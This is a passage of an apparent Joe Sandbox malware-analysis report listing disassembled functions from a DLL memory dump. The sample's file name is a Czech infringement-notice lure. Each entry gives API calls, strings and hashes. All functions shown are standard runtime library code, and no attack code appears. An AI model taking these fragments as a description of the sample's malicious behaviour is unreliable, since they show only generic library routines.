Part of subcall function 6FDF5503: DName::operator+.LIBCMT ref: 6FDF5524

DName::operator+.LIBCMT ref: 6FDF69F6
DName::operator+.LIBCMT ref: 6FDF6A56
DName::operator+.LIBCMT ref: 6FDF6A63
DName::operator+.LIBCMT ref: 6FDF6AAA
DName::operator+.LIBCMT ref: 6FDF6AB7

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: 57da6066638ddf49115b4492286c3c11627ec151bf009652d48864f570184248
Instruction ID: 2084511c22e688195dfcdde52a71ef67829ea3aef7697332da1ac5a77656289d
Opcode Fuzzy Hash: 57da6066638ddf49115b4492286c3c11627ec151bf009652d48864f570184248
Instruction Fuzzy Hash: 2C5163B5901309EBDF45CFA4C855FEE7BB9EB09704F02815AE505A72C0EB34B645CBA0

Function 6FDF3D00 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__TypeMatch.VCRUNTIME140(19930520,?,00000000), ref: 6FDF3DAF

Strings

RCC, xrefs: 6FDF3D32
csm, xrefs: 6FDF3D47
MOC, xrefs: 6FDF3D26
csm, xrefs: 6FDF3DED

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: MatchType
String ID: MOC$RCC$csm$csm
API String ID: 3879256720-1441736206
Opcode ID: 89a5cb353a7e3f2209e377149814bcd141d7cbe5dfb72b680259369b4db4e575
Instruction ID: 5cf9c39c4d97fece20c5f21f7b428fa103dae45392f844b218ac360e4fe9103a
Opcode Fuzzy Hash: 89a5cb353a7e3f2209e377149814bcd141d7cbe5dfb72b680259369b4db4e575
Instruction Fuzzy Hash: 27315935802705DFCBA08FA4C902F9AB3B4AF01319F170A5AC8925B191C375F647CBA3

Function 6FDF2EB5 Relevance: 9.1, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

__telemetry_main_return_trigger.VCRUNTIME140(6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F14
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F21
memmove.VCRUNTIME140(?,00000000,?,6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F59
___AdjustPointer.LIBCMT(?,?,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F72
___AdjustPointer.LIBCMT(?,?,?,6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F95
memmove.VCRUNTIME140(?,00000000,?,6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F9E

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: AdjustPointermemmove$__telemetry_main_return_triggerabort
String ID:
API String ID: 4025328792-0
Opcode ID: 7ae0e629686cc6a2bc821b579ad249142d88f1fb68804c58c9759bbabeac09c9
Instruction ID: 4d8fe051985d3177d0c32a576893f934d2a1c2faf682c7463d91bb8dbf791519
Opcode Fuzzy Hash: 7ae0e629686cc6a2bc821b579ad249142d88f1fb68804c58c9759bbabeac09c9
Instruction Fuzzy Hash: A941CC31A13782DFDB468F52C450FAA77B0AF0632EF12022EDC5597290E731F882CA90

Function 6FDF9C63 Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FDFB175: Replicator::operator[].LIBCMT ref: 6FDFB1B2

DName::operator=.LIBVCRUNTIME ref: 6FDF9D0F

Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9910
Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9BDA

DName::operator+.LIBCMT ref: 6FDF9CC9
DName::operator+.LIBCMT ref: 6FDF9CD5
DName::DName.LIBVCRUNTIME ref: 6FDF9D19
DName::operator+.LIBCMT ref: 6FDF9D36
DName::operator+.LIBCMT ref: 6FDF9D42

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 0ea57b8a1dfdd9f7fd27f960842672e4516fcc08e6bbf6b42225dd71dce41eaa
Instruction ID: 6aaf51059a81c0c6afc5a760f1e7a98828e5bb2bafa9d5bb8bdd56745274b865
Opcode Fuzzy Hash: 0ea57b8a1dfdd9f7fd27f960842672e4516fcc08e6bbf6b42225dd71dce41eaa
Instruction Fuzzy Hash: F031AEB5A06304DFCB58CFA8D850EAABBF9AF8A304F11841DE58697394D734B546CB20

Function 6FDF47D0 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON

Download Yara Rule

APIs

___unDName.LIBVCRUNTIME(00000000,?,00000000,6FDF4710,6FDF4720,00002800), ref: 6FDF47FD

Part of subcall function 6FDFB600: ___unDNameEx.LIBVCRUNTIME(?,00002800,6FDF4720,6FDF4710,00000000,00000000,?,?,6FDF4802,00000000,?,00000000,6FDF4710,6FDF4720,00002800), ref: 6FDFB619

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-00000002), ref: 6FDF483C
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000004,?,00000000), ref: 6FDF4859
InterlockedPushEntrySList.KERNEL32(?,?), ref: 6FDF487E
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6FDF4888
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6FDF4891

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name___unfree$EntryInterlockedListPushmallocstrcpy_s
String ID:
API String ID: 2809682464-0
Opcode ID: 39462487c09307fdca256e9b07e8a626366d7f19607c47b7d988ccb92ddec84c
Instruction ID: f66ade107b0d58429f7275f7310e5cad57de2971b5d2a271013419210db742e5
Opcode Fuzzy Hash: 39462487c09307fdca256e9b07e8a626366d7f19607c47b7d988ccb92ddec84c
Instruction Fuzzy Hash: 8121E031901345EFDB048F64CA44DAA7FB9EF47324B12806AE805DB201E732BA16CBA0

Function 6FDFB880 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6FDFB8B5
__IsNonwritableInCurrentImage.LIBCMT ref: 6FDFB96E
__telemetry_main_return_trigger.VCRUNTIME140(?,00000001), ref: 6FDFB987
__DestructExceptionObject.VCRUNTIME140 ref: 6FDFB98D

Strings

csm, xrefs: 6FDFB958

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: CurrentDestructExceptionImageNonwritableObject___except_validate_context_record__telemetry_main_return_trigger
String ID: csm
API String ID: 1358989434-1018135373
Opcode ID: a29eb2e8fff221f99050039c0ad43f5ee7ab4f8b3fe38678226f6412b7d2e141
Instruction ID: b0d1982c986e1a1fad7f5c33a2507d1e88533fcf785b0a65d06c8aeaaca9e1a8
Opcode Fuzzy Hash: a29eb2e8fff221f99050039c0ad43f5ee7ab4f8b3fe38678226f6412b7d2e141
Instruction Fuzzy Hash: D1418134A0130AEBCB40CF69D844EAE7BB5EF45328F158155EC149B2D1D732BA16CBA1

Function 6FDF4CB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6FDF4C62,?,?,00000000,?,?,?,6FDF4D8D,00000002,FlsGetValue,6FDF13D4,FlsGetValue), ref: 6FDF4CBE
GetLastError.KERNEL32(?,6FDF4C62,?,?,00000000,?,?,?,6FDF4D8D,00000002,FlsGetValue,6FDF13D4,FlsGetValue,?,?,6FDF4B19), ref: 6FDF4CC8
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,api-ms-,00000007,?,6FDF4C62,?,?,00000000,?,?,?,6FDF4D8D,00000002,FlsGetValue,6FDF13D4,FlsGetValue), ref: 6FDF4CDD
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6FDF4CF1

Strings

api-ms-, xrefs: 6FDF4CD5

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: LibraryLoad$ErrorLastwcsncmp
String ID: api-ms-
API String ID: 3100911417-2084034818
Opcode ID: e6e7604d99afb91fbd21b90f8325b4ab448c9a0ff68aaf5dec5a04c8d657817f
Instruction ID: 0f16069f4d79bd10b991aa7589ddf802e36946a90ea794d92a5cf6a8314b2a73
Opcode Fuzzy Hash: e6e7604d99afb91fbd21b90f8325b4ab448c9a0ff68aaf5dec5a04c8d657817f
Instruction Fuzzy Hash: C8E01A30244705FBEF502B60DE09F483FAAAF03BA1F118025F90DE8091DB67B575DA98

Function 6FDF34A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,6FDF342E,?,?,?,?,?,?), ref: 6FDF34C9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,6FDF342E,?,?,?,?,?,?,?), ref: 6FDF35D4

Strings

RCC, xrefs: 6FDF34E3
MOC, xrefs: 6FDF34DB

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: EncodePointerabort
String ID: MOC$RCC
API String ID: 1188231555-2084237596
Opcode ID: 04ecd5115b399ade4d85f3f0c8959806607adc730ba0d667161e23e34678e38c
Instruction ID: aeacb7a30909375ed2c7ce0de796dd41a4e4e4738d6ea9b21be09615c012fd66
Opcode Fuzzy Hash: 04ecd5115b399ade4d85f3f0c8959806607adc730ba0d667161e23e34678e38c
Instruction Fuzzy Hash: C7416AB1901209EFCF02CF94C981EDE7BB6BF89304F168099F909A7250D335EA52DB52

Function 6FDF3F00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

_FindAndUnlinkFrame.VCRUNTIME140(?), ref: 6FDF3F14
_IsExceptionObjectToBeDestroyed.VCRUNTIME140(?), ref: 6FDF3F7E
__DestructExceptionObject.VCRUNTIME140(?,00000001), ref: 6FDF3F92

Strings

csm, xrefs: 6FDF3F1C

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
String ID: csm
API String ID: 1567117672-1018135373
Opcode ID: 21f08ba0169086a516a91c7ffde4c0bd8367c221ead652a5b93cabb1e95b1547
Instruction ID: a3c2859cdc16797d642ccbbaec893a5c456bf81a3720fe6131aa42f91fc7f2a9
Opcode Fuzzy Hash: 21f08ba0169086a516a91c7ffde4c0bd8367c221ead652a5b93cabb1e95b1547
Instruction Fuzzy Hash: C931E339507301DF82889F66D545C0BB779BF1222A3A706D9E4256F2E2C731F943CBA6

Function 6FDF7883 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FDF5203: pDNameNode::pDNameNode.LIBCMT ref: 6FDF5229

DName::DName.LIBVCRUNTIME ref: 6FDF7942
DName::operator+.LIBCMT ref: 6FDF7950

Strings

void, xrefs: 6FDF78D3
void , xrefs: 6FDF78EB

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name$Name::Name::operator+NodeNode::p
String ID: void$void
API String ID: 3257498322-3746155364
Opcode ID: 2b4f8c644cce212f9677c24dcfa4a5940bb8d5d1d83c776052ae0ff04a9af0f6
Instruction ID: 24145c29255b57b949c66d0b9c61074a06ee80d0fd9a685cd9b75843314d5905
Opcode Fuzzy Hash: 2b4f8c644cce212f9677c24dcfa4a5940bb8d5d1d83c776052ae0ff04a9af0f6
Instruction Fuzzy Hash: 51217A75C0120EEFDF44CFA4C851EEE7BB9EB06348F01815AE951A7280EB307646CBA0

Function 6FDFB7D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

___except_validate_jump_buffer.LIBVCRUNTIME ref: 6FDFB7D6
RtlUnwind.KERNEL32(?,6FDFE372,80000026,00000000,?,?), ref: 6FDFE36D
_local_unwind2.VCRUNTIME140(?,?,?), ref: 6FDFE3B4

Strings

02CV, xrefs: 6FDFE391

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Unwind___except_validate_jump_buffer_local_unwind2
String ID: 02CV
API String ID: 3811726867-2950495812
Opcode ID: 675df0e8f9bd3718a469214980d2feff9f8236bac0195936a58b37703542a62e
Instruction ID: c225a4d3888ab0e1c7c01702e285b03cb0adf759031350dd4f11a842f65c595f
Opcode Fuzzy Hash: 675df0e8f9bd3718a469214980d2feff9f8236bac0195936a58b37703542a62e
Instruction Fuzzy Hash: F82167B1901314DBDB40AF54D884F8ABBA8FF04314F120664EC54AB286D775FC86CBE2

Function 6FDF39A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_FindAndUnlinkFrame.VCRUNTIME140(?,6FDF3987), ref: 6FDF39AD
_IsExceptionObjectToBeDestroyed.VCRUNTIME140(?,6FDF3987), ref: 6FDF39FF
__DestructExceptionObject.VCRUNTIME140(?,?,6FDF3987), ref: 6FDF3A14

Strings

csm, xrefs: 6FDF39C9

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
String ID: csm
API String ID: 1567117672-1018135373
Opcode ID: 5164f4a61ec40da724820d36c6a79c2b0ca77726b939c5fffe7c88a1c1d6fb9a
Instruction ID: b07860585e614992c7ed921e5493e5da75dba3e2f56dcb77be015450b3b6f840
Opcode Fuzzy Hash: 5164f4a61ec40da724820d36c6a79c2b0ca77726b939c5fffe7c88a1c1d6fb9a
Instruction Fuzzy Hash: 77012838803304EFCB649F62D502E6EB7B5AF00216B53552EDC522A690CB31F686CA63

Function 6FDF2D20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6FDF2D55

Strings

MOC, xrefs: 6FDF2D32
RCC, xrefs: 6FDF2D2A
csm, xrefs: 6FDF2D3A

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: terminate
String ID: MOC$RCC$csm
API String ID: 1821763600-2671469338
Opcode ID: 798e92e7c3d26e306f3f5f99b31a1f3c19eeafae3f69df68ca3e282df59fa8ad
Instruction ID: 04d0d90739ff076e2cb8bf35e5c6b93e90aa9294a8ade0bad46447f27189080c
Opcode Fuzzy Hash: 798e92e7c3d26e306f3f5f99b31a1f3c19eeafae3f69df68ca3e282df59fa8ad
Instruction Fuzzy Hash: C9F0F839402315DFCB545F65CA01D8ABBA8FF4222EB2300AAD81497161C7B8F952CBE6

Function 6FDFB7E2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 6FDFB7FF

Part of subcall function 6FDFF710: __FindPESection.LIBCMT ref: 6FDFF769

__telemetry_main_return_trigger.VCRUNTIME140(?,6FDFE0C5,?,?,6FDFE0C5,?,00000001), ref: 6FDFB815
__DestructExceptionObject.VCRUNTIME140(?,6FDFE0C5,?,00000001), ref: 6FDFB81B

Strings

csm, xrefs: 6FDFB7E9

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: CurrentDestructExceptionFindImageNonwritableObjectSection__telemetry_main_return_trigger
String ID: csm
API String ID: 1907827047-1018135373
Opcode ID: 5554f94e95c2bb492647ffa62783d09f1b6aa119f614b8b60935c3acc52e3ce7
Instruction ID: ee305efbbc57ba2baee67642c7f55a6e1ed9c482ebadd5d4fa732dfdbb812b13
Opcode Fuzzy Hash: 5554f94e95c2bb492647ffa62783d09f1b6aa119f614b8b60935c3acc52e3ce7
Instruction Fuzzy Hash: BBE0DF36007315EBEF001F80B801E883B99AB063B0F02802BE900D32808B327861CAA9

Function 6FDFBAD0 Relevance: 6.3, APIs: 4, Instructions: 275COMMON

Download Yara Rule

APIs

__FindPESection.LIBCMT ref: 6FDFBC01
VirtualQuery.KERNEL32(83000000,C5B665AE,0000001C,C5B665AE,?,?,?), ref: 6FDFBCE6
__FindPESection.LIBCMT ref: 6FDFBD23
__FindPESection.LIBCMT ref: 6FDFBD5D

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: FindSection$QueryVirtual
String ID:
API String ID: 2992484814-0
Opcode ID: 63a88bf5c2b7090acfc78c38fb1b4cc827f931e2019a881be434aba53b3fc436
Instruction ID: 252b5c99ce0af6a7c9fccd0840157ace36cfde0a7e6fba821b0792f12b6c2b2a
Opcode Fuzzy Hash: 63a88bf5c2b7090acfc78c38fb1b4cc827f931e2019a881be434aba53b3fc436
Instruction Fuzzy Hash: 0FA1B075E02706DFCB50CFA8C940A9EB7B5EB4A724F524269D815DB2D0D736F8228B90

Function 6FDF795A Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FDF7961
UnDecorator::getSymbolName.LIBCMT ref: 6FDF79F3
DName::operator+.LIBCMT ref: 6FDF7AF7
DName::DName.LIBVCRUNTIME ref: 6FDF7B9A

Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4

Part of subcall function 6FDF57D7: DName::DName.LIBVCRUNTIME ref: 6FDF5825

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
String ID:
API String ID: 1134295639-0
Opcode ID: ca919489705240a464a95b7d68ba2ae13465db09080fc5929176d56b9c579e4a
Instruction ID: 4df512a33eb4a2008bf7e018ac9617c386abfd01df7184f9c0a8155b26ca606e
Opcode Fuzzy Hash: ca919489705240a464a95b7d68ba2ae13465db09080fc5929176d56b9c579e4a
Instruction Fuzzy Hash: BA714975D0670AEEDF81CFA4C480FDEBBB4AB4A324F56415AD814AB280D735B946CB60

Function 6FDF7FC4 Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6FDF80F8

Part of subcall function 6FDF5314: __aulldvrm.LIBCMT ref: 6FDF5345

DName::operator+.LIBCMT ref: 6FDF8059
DName::operator=.LIBVCRUNTIME ref: 6FDF813D
DName::DName.LIBVCRUNTIME ref: 6FDF816F

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=__aulldvrm
String ID:
API String ID: 2973644308-0
Opcode ID: 48e6c245afde8c44b7d43aca55efc39026ae44f91536a2cd8fe17bb1d8d74320
Instruction ID: 576e7f36d1e8d171f2216c1b6d900be0285bf662dee28078ac98b1b1be6436c0
Opcode Fuzzy Hash: 48e6c245afde8c44b7d43aca55efc39026ae44f91536a2cd8fe17bb1d8d74320
Instruction Fuzzy Hash: 0D617C75D06316DFDB40CFA9C840E9EBBB0BB46304F02825AE450AB290C771BA46CB91

Function 6FDF423D Relevance: 6.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 6FDF428E
TypeidsEqual.LIBVCRUNTIME ref: 6FDF42B3
PMDtoOffset.LIBCMT ref: 6FDF42C9
PMDtoOffset.LIBCMT ref: 6FDF434A

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 38584ea5e3f0bcb2bdcd95a26988dd38a07d0493eba6fec8afcf67d837ab5845
